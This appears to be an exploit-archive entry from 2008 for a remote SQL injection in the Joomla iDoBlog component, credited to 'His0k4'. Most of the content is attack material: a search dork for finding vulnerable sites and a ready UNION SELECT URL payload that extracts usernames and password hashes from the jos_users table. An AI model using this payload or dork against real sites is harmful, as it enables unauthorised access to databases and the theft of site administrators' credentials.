id: 3112
date: 06/02/2008
title: Joomla Component iDoBlog <= b24 Remote SQL Injection Vulnerability
author: His0k4
cves: 

==================================================================
Joomla Component iDoBlog <= b24 Remote SQL Injection Vulnerability
==================================================================



#########################################################
#							#
#    Joomla Component idoblog Remote SQL Injection	#
#							#
#########################################################

########################################

[*] Founded by : His0k4 (Algerian HaCkeR);
[*] Greetz :     All friends & muslims HaCkeRs  :) 

########################################

[*] Script_Name: "Joomla"
[*] Component_Name: "com_idoblog"

########################################

[*] DORK: inurl:com_idoblog

########################################

[*] P.O.C : /index.php?option=com_idoblog&task=userblog&userid={SQL}
[*] Example: /index.php?option=com_idoblog&task=userblog&userid=<valid_userid> and 1=1 UNION SELECT user(),user(),user(),user(),user(),concat(username,0x3a,password),user(),user(),user(),user(),user(),user(),user(),user(),user(),user() FROM jos_users--

########################################



#  0day.today [2023-03-21]  #